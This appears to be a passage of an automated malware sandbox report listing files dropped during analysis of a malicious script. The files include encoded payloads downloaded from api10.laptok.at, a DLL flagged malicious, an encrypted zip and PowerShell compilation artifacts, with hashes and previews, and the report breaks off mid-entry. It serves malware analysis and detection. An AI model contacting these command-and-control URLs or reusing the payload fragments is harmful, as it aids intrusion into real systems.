Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bf[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	267700
Entropy (8bit):	5.999836336819629
Encrypted:	false
SSDEEP:	6144:LO9BcSK5cnihVRakwHDgwodbX+Un+IQ7fqjeMRmd1:LkLn8VRl1woVX+2RQrtBd1
MD5:	FC226C805B21348897F9CF750630EBA6
SHA1:	5F20971E026402B862B9A62A6B4CCCE997BFE90E
SHA-256:	B2BA15FFD15238328B301C92BC4CB4CA7C5B500826146DBFACB98B261E12FB31
SHA-512:	CC7D68BC7D29F45BBC9152AA9D360263B8F56675ED71C273C7750D9B268DF99A72C0B8CC2F0D2A1881784750D05CA8ABA9C5DA52393BA9AE27A2338F6EB13E2C
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/wRVY2NGdrRF/A_2Fha_2BTMf9b/Bkb0axFyVYg6CTiYCB0u_/2BNYoZUqIeFy6mXY/RsCAvo5yVPYtDbs/KEFb4oNdgILibF2Swr/I2w7rEJuT/Pp84EV24JCnppdQDLtg7/0g_2BJz5R_2FkQu9e_2/FGSaB0rJRCWjGvLRGTnGVc/Iu0pUH4kxZUPO/79c_2Bxp/zIxSbOn31EVZ_2FT_2BE4Ox/zrp24711fz/qBCMvOouQ_2B_2FBw/tevTXGEDmXVA/Fo3RVdsoq0v/QtV4LsUKm4P4d7/Q_0A_0Dq_2BFdmy3Ge3KN/bxiA2odSfTOC3fY6/QHvvQODRC/J_2BkRbDk_2F/bf
Preview:	bCDmG56/ZGJCnK57yB48316E1AwMxoZFpLJ/fL6RyHH6z8WWxfeP5zslI9nQJixRoABWeyYOh+QvmbbTogob9cq/3ayFjfEgr8iqVOjarjeS13gakZSlB5kYToxRul+cKcG5DoKRCFpia5IoNTX/cqQdxLTX41TXxNTjfFlnpJy88JrJLpXK8HMnRefEmshmLublL1L0nsQPylestSsciJS4KMnnDn0t/jzqFb9ej9iKhd58CiFPMmaQChq0SoL+BzPjSp20D5BFf3ayIVCFQp+I9tuN8q8q7hIJ6FpBcNvutQ3KX6863HQhKvpXkBrepMOcF0FYtvC9Tc/wFS+d6pmVVTf/ujpuwmI8HJSCQAj4JXtM7YpFLj87pnV0ijP+L+oF/AVd55puLadVfoxK+Is6XbJeLxCrgEBb/QWaL6SV8HBpDcQEPrcYDOznjDm8ATNlzK86vGAKxBfH8CiNw6qIaInwrJQ/rOIErZGDkTtyKGrvAkaHqg76KhBAiQ3BNn+H1nU27D0pO/KA58JS+10MCKOY31FWx9CAHcHarDnvbRnk0WTqje/i4QbODSp8g6XJuaa95ltgYOKbGxadZQ9IfFNVrSEwxRqYkBZcnGu2EtpWpC1Ks/fYLJOX/z1lelzjN5PluvEWV2H60wq06JnJl85dFWDBfcTjv/sS837YVzTtI1wae22Xzk2wERnobGvULJhD1FNbylgTCyH9UCS2Cq/NUzEARHSOZCnYB7woyDdlFIAbMHBkwHJV23NKATjqITLAkmobXJXh/zEItrLapPklZsumwXAolxOqgaRl9EmartlkRMjScYA6AtZSBcSgzDAxgZtyTr3kQQJscv4qgSjhVDW8kWO66xm8u/3H7SS/LXh3BryRRetoELZcetKWzVRTXAeeTiDajUn/ke8Gp7ra1aSdTNW/jhrUJ8UANKS4hUiafZ8HDBpR38v24/ZL4Db0DER2nJm+aHTEIBw66My91kYg1Xh6UlvK

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\N[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2408
Entropy (8bit):	5.984213394225501
Encrypted:	false
SSDEEP:	48:OurJo1eykcgE0yDBKjVqAW1iuR6RVWuYRJb77okJIfWo:nKzkyvGPW13R6vYRNsfz
MD5:	99911885EF8527B9BB520959D0400D23
SHA1:	A214A86649EBA314D4BF4C1ED2AC48CAC7EEBA1B
SHA-256:	6A56806C098AA9CD6ADFD325BE3E9A05FDA817BD175A469A5027339EEA4C9058
SHA-512:	58A1F7252A01A5EEC8375316FB178361DC6A7D1AA6275370B760D15376EB47DE50901CD5F024AB6B738EB22FC0447D249126F76ABA3B2EBF81F4E2BE3CB96F8E
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_2BbaPBw_2BvxMvagxVqPyJ/jSUh2wAda1/gHbr670JVUq1KwK7N/6uxLXG5CHSWb/dgl5wFu8VM1/Rkwn44dvXkxcGr/6ai4evYmGZZapTEFZPM6t/l7dnGylpkoukj_2B/UIph5LMwbusYJYR/SgNVcjHjuu6gNQMV1u/yo8w_2BDc/tr29yULxa_2FW8vjKL1w/IkKYcWnRbp20t9pYrs_/0A_0DOoPdbEyCpXUb3P_2B/SP7qNsXNt82Vl/EBYqhcdo/ksN77WU_2Bu9u_2Bp6ImMCY/qmYYk7_2FYRubl/N
Preview:	dc5Myj1zX7wL16anUxKQbz0PUOVZccb3OWc2KaU5+XF1MrQFi5BV7tYx7BVtZTNjiJ4fPn/SH+6LpMOl9zy0PHDvdc1lteTU0DMsO0xKrJ2AJBhibqs0KAZjyZ2sATERlhsdm7/JrNq5iWPBI026FWqTzpw/E+iy/D1HCAxeakEUXanAlqIYdJVX2tjtziBfVxf9HFOuD0gXtSQqptUTh1GuewVWXfg7K1l6qMZXohnzDheZ+hO4JWUdY1G6C5TU7nGN1CzHxAx9rzc+7dBrMEHMrX/hFNwnZC5YRnKDiiWkzqW3qNWXXU23dnvOno54EE6JnFwpj3a75ko3/blADxve+zDiEAqDbvVLJAn2SEEybIqQG+c1hUe4DM7q6dY6wTRaJ9+kr2Faq0KjxDpfAaz/J7eRc3F86mOUUfhhZ+qch//Zv9OEuUbEummoMGReikRWVckbemdwmEzVgNSCiHpCY3r0L/rCWu6Rnoxa8M/zPljyUBPcWXjFVJDxpOW7G6k/iaI8TEQDYJr+iDAWzmmCN1N89rVDh9xrDVNPNlpuifS7S1ByEqoMfoEpCnxManZ/5CmJes5lxUz1ksnZjPSTpcoVJcIBDP2Svyfq3smofUMt0BsVHGKDs7O9RKHta7HHWZ4cy8oiqh69Mh9d3WUcD6OzCzR2xgtGXLn3ik618P0/CZ/HozGsVwB671/tTlbLqnV9XUTaHtLmc57EPDB54VvJLM53YU0P7IceRAZiPfZ+Ad1GdKGoj2BmcRcuqjA6EQIDA3sy2AePwSr0wNqED9SRm/RvuyUvhoCrFizu/NKJG4ekC5vWFWOFo+X11EG3tLHladPjLUNDLRWz/Ii/89l0UFGTmkyHLIAw1wAOYZgkAohqmgmpEzhEgot2hGSg1MOhC+gnykRezoR7/P6726Zap1bjfYtnPJ7Wy6vUMKKhKYivcP/raiyymBY/h0MP2y3w+mCTOwMpD8D8v+6KHVOL4iD8miJtfC+m

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\s[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	338008
Entropy (8bit):	5.999869391852298
Encrypted:	false
SSDEEP:	6144:X36/dI+cmFqVRwgq2o/JG/IRKIyyCmZm/hKC2Ny5vWb1OB/sQx2IKtA4QMO:a/dINmGREBXE3mUIC2nXc2IKW4Qp
MD5:	03D61BB1F49164FA9812A5E896C67F3E
SHA1:	85FA697A67481A5631B61FB3F539B4503B929EA1
SHA-256:	CDE50C5D8FC8B941FD19E1F70B357635061FBFE6F9A0D5BD4C0CFD9F46BF8436
SHA-512:	04E6947E4C892007BD46F9FAA52D9B792892A929AFDCD2797091F54EC65D2822366F0A0743EB20B9E1497B08E164F5DB194010186D31B65831CB9C839A71C784
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/1uvbKU_2Bbc/ULu41miz1odgDS/0s31zFbFtyChQRUZdq4O6/uZoXvkdGnqZk3S6m/sjGRAy2VVHXHIWC/GbATokLhfRKxJIkWlf/rpIWzL8Zz/AoLyYIkQLp5Egmn3wei2/_2BYsLzf0AqH_2FfXyU/ERE14WKmMp42qnHDG4GKCW/dW1JtsfpRq1bQ/nxcOGVyd/44_2FNnM0ZUEbkxaxhi6GSR/lIHQEHFzka/2x7wIaFlGrWFy74sl/6cFqI7aHF8g5/CnaY7J6ktLq/m_0A_0DTO0929p/475exW0EBf88dYERW4hkW/yci4B7l977luXmG4/ieH0MCQdwnavDmP/zBg2fJ8N/s
Preview:	ix+4zopyS5Zb1yhQYCwOCVX8cdmxlByXC8UyxeQK0zznJlDVK9Oxl8Rq1F05vsKoIReV9UZOLSxZ1jvHDnCVs4gT5YM0PY/Ugn/E4Q8lv7AbuXQNF919sT99Z5qQ5oLVwLPRJJjRaRs8w0Yb0L/FMjrqCAAQ3HHRoRJfEqVsmy5BRYhbJLTGlFiHAEQ6mXalmlkwlt1V9HFEZuG/O3LXXsAkNj9dgUwDEpOLhnTxRp0/XP3bIxs5gyKVhVPYphhfmr1dJrkKxo9a9/c5ibgljvaI/GdZWjwqqgLrhaQonD3/o9AhWMu2xZ3yXsA08eboPRIQXj9zOicR/ip6PtDVocwDkwimC+ACJ5uobFopja2yO3cVeiF2xJSzHxvccwII9EZFEhWpEavbPx/D4ZXg7YtbEbDoX1VWryX4fAcx9V7ZRJ3UrvXA0H4IzCvfoAvhXe9wu6gfxLWXaY0C47fRrcxJjFl5JJR0UMzb3bqE6I2qE0tF0H0UZ+Vr6+esPmFbLzjErDldhK8LrgEtO2y3wS82DKjypVmH68MYEedt1I1yssNAzaZbnlvrIs+r0sjCOUKrzhQlwWuIPbL7oJ+VeR5elHyyhnRFAsymKu8YMOJDEiqfqfUsosgV/OEm+kBstS7l8o+OlOdP67DLUNUjCZGHiG1Xdfxqwy7QePTlH5zKfmx7hucr/wDCYhWv9EGLpytc3Jt28tLKqXhrYFnInjBO84x8ZQEuaaj/QPUhqZbdulImaf/JkFslNxOrJh8NdV6/MN5noGp0Pepmur7ldmdzCM+WPkKW9EvlABimnJDYbt0QfkSKdAcHbCdchWLWVhDruMAn1GBH7Rx3kzUYBu3gK2CEIqq7n+EJuq9Yz4k/9IAXAiodT7OVSgOxcp34CPUsmkb8Rvqcu8dfndVOdARDUt1yXb2hBgteYrxc4Suuo59wOMPeYFueTpxivJQwKwAu9wu+I5z40daKVd6r4iwA0WExliDIbKfkWB+/

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.8910535897909355
Encrypted:	false
SSDEEP:	192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
MD5:	7A57D8959BFD0B97B364F902ACD60F90
SHA1:	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
SHA-256:	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
SHA-512:	83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
Malicious:	false
Preview:	PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1192
Entropy (8bit):	5.325275554903011
Encrypted:	false
SSDEEP:	24:3aEPpQrLAo4KAxX5qRPD42HOoFnCvK39tOBPnKdi5:qEPerB4nqRL/HvFnCvO9tOBfui5
MD5:	5F0686EAB07B96DB46D73AE2F197B684
SHA1:	A363868CCBA7CE93E82670B31F29B67898C43385
SHA-256:	7E66330E60DB9E14D2E174A05C68CFE7B06D050E73D737C2426873E900B46C0A
SHA-512:	7FF15E7DDD382E33FD2D762869751AB9296B5DDF33F442136D7F953F080B1FAE592B1B436E08F3298B7479B8C967BA708138FBE6A3FAEF637D272BFBF6006A4E
Malicious:	false
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\8F31.bi1 Download File
Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	112
Entropy (8bit):	4.48992345445028
Encrypted:	false
SSDEEP:	3:cPLgeqnhARtt7TSjjhThARtn6an:o0eqnWbtChWbn6a
MD5:	1784914AE468F35A55BBAF2A8D746D04
SHA1:	7959C412D18BEBCE89AF9DC3715AA17A703467B1
SHA-256:	E32BFF5542AF45D88A381F1F0239906ACC07E086FD4F93D9A057A70D48DF4E1A
SHA-512:	CD36A88A3E8E5D11B606B65A72070FD1A60960ED7D4CC0713274039E328038FD129FC57DD806A8F66D2A82E9AF18304E7E39E494A75ECD3B40CA7EA6EE3D688C
Malicious:	false
Preview:	Server: resolver1.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 84.17.52.25....

C:\Users\user\AppData\Local\Temp\Ammerman.zip Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	41922
Entropy (8bit):	7.9900732828260255
Encrypted:	true
SSDEEP:	768:iPRP7HHNs72bLXJnkNQmgOAhghqgwZJTpT/6gKffcvv7ovDTvxfz:GRP7HnbLZkGLOKBJT2ffhvvxfz
MD5:	94F926A14F611ED85B2AD7F5C108D930
SHA1:	920C9F8B4B8100DEDA928646DBFABA7D8E7AA6DE
SHA-256:	BA9979A733F1226AD56803023880155FECAAEDAB7ABB4DC9552BD674D47FE62F
SHA-512:	3DD6E4E6381AC5128860FF102E4CD3625E5BB621A077CD367231BD8FB49CD9BE09C0DF0C2AC7EAD62015DE95C446904124041460555A78225ACB2D72DD8DC506
Malicious:	true
Preview:	PK..........rQ.}..............earmark.avchd..8..8N.$....![Hb.bl!..k...C.2.o!..\|J......e.%F..Ra.......W}...s~../.u.......y....{...~............8.vv..4...h...?a.`.50...:._._.............8......8....y.`......p........0...@.@.j....{4:..~zz}.=`...M.? .G:..<.#.......u......._0.L.\|4z..,.wJ.............r.:...-.?....::.ig.u4......t.t....G...A.......?.j......a.7...F..1#.f...K.N_N..{...4\|9...v.X....3..&6:3.T-...:.1.lf.9.F;{..3........o....t2tt..@\|....^.:..;..............`.`~....v..54....K.......c....p..K.DX..{4B.].,..a...P.h9....F#H.:..}hM.(.I.WS..Fk^...;H..o.Wc..2..H_...X..u.<....X....Pg.$.g,.~.O.+.s.dI.=.D.1.6.!....9..<6Z....b.h...0>s..*...$..v...N.I...'.S.........G.qck._.k.:....j.N..........K...x..Mk....#ugE...G....R..G...%.d!mk.d.._..."l...>P.3......S.....<....Ws..!.......f.L.$.$.e:.U3.H.T.$.......h-{.ag.}...%D..^.H0.....Z........j.......h.J.G....o......`.d.ee..8y.s../...V......=wm...aT+..&...e+.p_....m8gz9...\|..W.h,...2.Q..N.L.......?"..<.@7W.

C:\Users\user\AppData\Local\Temp\FCC.cxx Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.413909765557392
Encrypted:	false
SSDEEP:	3:4EA3ppfn:4LZx
MD5:	1F1A0E8B8B957A4E0A9E76DAD9F94896
SHA1:	CC1DDD54FA942B6731653D8B35C1DB90E6DBBD34
SHA-256:	D106B73E76E447E35062AE309FE801B57BBEE7AC193B7ABCF45178ADA7D40BB3
SHA-512:	10505ED4511DC023850C7AB68DDCE48E54581AAC7FD8370BAFE3A839431EFC2E94B24D3B72ED168362388A938348C5216F1199532D356B0F45D2F9D6B3A2753E
Malicious:	false
Preview:	ZWJmCemKPVQNwvupbUKEMAALZhNPjPJb

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.504686487117389
Encrypted:	false
SSDEEP:	3:oVXVPN+SLSQ4s98JOGXnFPN+SLSQ4mn:o9v+SLZ40q/+SLZ4m
MD5:	8C5B553842846D5B42B8DD958958366E
SHA1:	3D4E98611BD63D569BB942AA9A4455BB8CF2CAA4
SHA-256:	1DCEA56951AE3EA7D10CF9A9FAD39CCE4BDFB93D1E9E6358CE1EE02BB0744B52
SHA-512:	DD49AF22783379440CC4750CC54F20D75E885E7422F147BA97945405D01AA45CBF6F34761912F8AA3711FEEFAD006E361C83741995342D2DE9199097EB9E5EB2
Malicious:	false
Preview:	[2020/11/24 20:35:26.769] Latest deploy version: ..[2020/11/24 20:35:26.769] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\RESD10C.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.687619956706255
Encrypted:	false
SSDEEP:	24:QhfvNDfHEQhKdNNI+ycuZhNYLakS5kPNnq9qpue9Ep:eJkyKd31ulCa3Gq9l
MD5:	C8360541629129A436F254EF83FE8AB2
SHA1:	010AD75CB0E277003B34B4FC76A4BD2DE880AF61
SHA-256:	84F5EBA422EBD657812C451664990F84F1D551BA7178AC8BC7E2ECD9D2C10D7F
SHA-512:	5405D47C720CB000281F104A30597BF78A866CB3BB6AD0CEA201461C677072D30EF29A8B26E0FA9151AE4C85C7FCF3FBFD2CDCE4284F95B25D9DF8CE341619B1
Malicious:	false
Preview:	........R....c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP.................\|....6..g..S.0.V..........4.......C:\Users\user\AppData\Local\Temp\RESD10C.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESE214.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.69094929733325
Encrypted:	false
SSDEEP:	24:bZfq6MfaDfHzhKdNNI+ycuZhNqakSiPNnq9qpFe9Ep:bBq6Qg9Kd31ulqa3uq96
MD5:	5C8A774A60412365A8522AFA217FA527
SHA1:	9E4AFF741009101F643CF3267BE21A1E8E65D761
SHA-256:	C6DBEA860A37744ADF845E9916F70B9912123A866969003F834AFF77AC6BCF8F
SHA-512:	46398920203E10925578D31BBA88B574E18B90C01348CE6779D2C6DEFD9FDF89883B1807377B809BA9A7560F3BE71D90C1BD2CBE55C48B1DAE14EBC8B814F09E
Malicious:	false
Preview:	........S....c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP..................n$d...!....d..........4.......C:\Users\user\AppData\Local\Temp\RESE214.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tolstoy.3gp Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.136842188131013
Encrypted:	false
SSDEEP:	3:L0a3dGn:AOGn
MD5:	DE116F46B1AB756FE5FC714826D9C77C
SHA1:	C0543E108146A86E97F9C92D84550415FF0D07F6
SHA-256:	B83A7A9918FBC774A1CBF2D5C700D86B64D91961728A7BBEC91FF74CE27C6CBA
SHA-512:	FFA07A13C6527B966AB311853D6FF493D9F9EF7B22A530DD52FE06CF41D43880A310F39826DD1D6ED24A54C8C4E0A70E4E2073F52B01BF045715F60833F02FE8
Malicious:	false
Preview:	thzQhBrCvRRGaQnmDrodlryY

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esgihrm0.n4e.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyuxnptu.ebi.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\adobe.url Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.699454908123665
Encrypted:	false
SSDEEP:	3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
MD5:	99D9EE4F5137B94435D9BF49726E3D7B
SHA1:	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
SHA-256:	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
SHA-512:	7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
Malicious:	false
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

C:\Users\user\AppData\Local\Temp\bowerbird.m3u Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	58
Entropy (8bit):	5.116264615668023
Encrypted:	false
SSDEEP:	3:AtNBcCRVqrGZgME1:AKAArcE1
MD5:	FCA5D5C49A23B8614C6F821ABC873200
SHA1:	C6982C28BD133E0317D388EFDFE29CB78A5AB6BA
SHA-256:	9EC7D8CE210B398464E1AE84073DA79284983AEA1AE6AD5985DC77AE95C1C242
SHA-512:	534D876A9BA54CAD210D801582A285D0F9E4385660B6ABFA5C278396644FBD41B1C4F7B2A5FDDB3F6EBC1BDEAE5D99D6E2E34F149697642F4B7E0F0510C641E9
Malicious:	false
Preview:	faHHqDeJlByuQgYuKmjhviPLnmNtvZyJwtONsUcwIeBPlokSmxWvLayqrB

C:\Users\user\AppData\Local\Temp\earmark.avchd Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	48128
Entropy (8bit):	7.67702661060525
Encrypted:	false
SSDEEP:	768:Nh66vv4Fgs48pcQqQjeCE+2SfNfAhghqgwZJTpT/6gKffcSapyLeq6pTXY:TrYJ4586SfZKBJT2ffXhkD
MD5:	78B3444199A2932805D85CFDB30AD6FB
SHA1:	A1826A8BDD4AA6FC0BF2157A6063CCA5534A3A46
SHA-256:	66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
SHA-512:	E940BE2888085DE21BA3BF736281D0BEEC6B2B96B7C6D2CD1458951FD20A9ABFA79677393918C7A3877949F6BFC4B33E17200C739AADE0BA33EF4D3F58A0C4ED
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 90%
Joe Sandbox View:	Filename: 0k4Vu1eOEIhU.vbs, Detection: malicious, Browse Filename: 6znkPyTAVN7V.vbs, Detection: malicious, Browse Filename: a7APrVP2o2vA.vbs, Detection: malicious, Browse Filename: 03QKtPTOQpA1.vbs, Detection: malicious, Browse
Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......_...........!...I..................... ....@..................................t....@.................................@...X....................................................................................................................text............................... ..`.data........ ......................@....reloc..............................@..B................U..}..u..*.............}..u.1....}..u.1....}..u.1.....SWV..k...............^_[.1.H)...k.6u..j@h.0..h@...j.....@.Sh@...h. @.P......U..`.}..u..M..U..0......a.........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.080277613656948
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryjYak7YnqqONPN5Dlq5J:+RI+ycuZhNqakSiPNnqX
MD5:	E2F26E2464F8CEF9212EEC94C7879864
SHA1:	C56029222106B5C125F518B71E2C717CF22FC0A5
SHA-256:	C68CD20770EAAC1423E9FB94784BC43643B7D3A6EC51E3CB0299626067288C51
SHA-512:	BDA50491455E08D10FC5D8C4509BACDC70FAF69C1970F326FEB91A0BB27DB6F75FBDEC8B5A3470504D6254C540C1A6C0DEC6B78C9820161B31204008BE3CC427
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.a.w.e.o.n.g.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.a.w.e.o.n.g.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	414
Entropy (8bit):	5.000775845755204
Encrypted:	false
